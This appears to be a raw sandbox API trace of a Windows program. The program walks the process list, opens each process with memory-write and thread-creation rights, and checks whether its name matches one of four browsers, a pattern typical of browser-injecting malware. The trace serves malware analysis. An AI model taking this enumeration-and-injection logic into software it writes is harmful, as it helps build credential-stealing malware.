	[0246.282] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0246.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.282] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.282] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0246.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.283] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x955c
	[0246.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.284] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.284] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.285] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.285] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.285] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.286] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9560
	[0246.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.286] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.286] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.287] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.287] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.287] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0246.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9564
	[0246.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.288] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0246.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.289] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.289] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0246.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.289] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0246.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9568
	[0246.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.290] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.290] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.291] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.291] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.291] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0246.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x956c
	[0246.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.292] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0246.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.292] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.293] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0246.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.293] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9570
	[0246.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.295] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.295] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.296] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.296] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.296] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0246.297] CloseHandle (hObject=0x4fd0) returned 1
	[0246.297] Sleep (dwMilliseconds=0x64) 
	[0246.404] GetCurrentProcessId () returned 0x110
	[0246.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0246.408] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0246.409] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0246.410] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0246.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9574
	[0246.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.411] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.411] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.412] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.412] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.412] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9578
	[0246.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.414] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.414] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.414] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.415] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.415] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0246.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x957c
	[0246.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.416] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0246.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.417] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.417] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0246.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.418] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.419] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9580
	[0246.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.421] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.421] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.422] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.422] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0246.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9584
	[0246.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.423] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0246.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.423] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.424] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0246.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.424] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.424] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0246.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9588
	[0246.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.425] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0246.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.426] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.426] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0246.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.426] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0246.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x958c
	[0246.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.427] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0246.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.428] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.428] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0246.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.428] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.428] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0246.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9590
	[0246.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.429] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0246.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.430] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.430] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0246.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.430] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.430] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9594
	[0246.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.431] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.431] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.432] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.432] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.432] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9598
	[0246.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.433] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.434] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.435] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.435] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x959c
	[0246.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.436] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.437] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.437] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.437] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.437] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.438] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x95a0
	[0246.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.438] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.439] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.439] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.439] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.440] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x95a4
	[0246.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.441] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.441] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.441] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.442] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.442] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x95a8
	[0246.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.443] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.443] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.443] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.444] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.444] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x95ac
	[0246.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.445] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.445] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.445] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.446] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.446] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0246.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x95b0
	[0246.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.447] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0246.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.447] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.447] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0246.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.448] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.448] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.449] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x95b4
	[0246.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.449] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.450] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.450] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.451] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.451] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0246.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x95b8
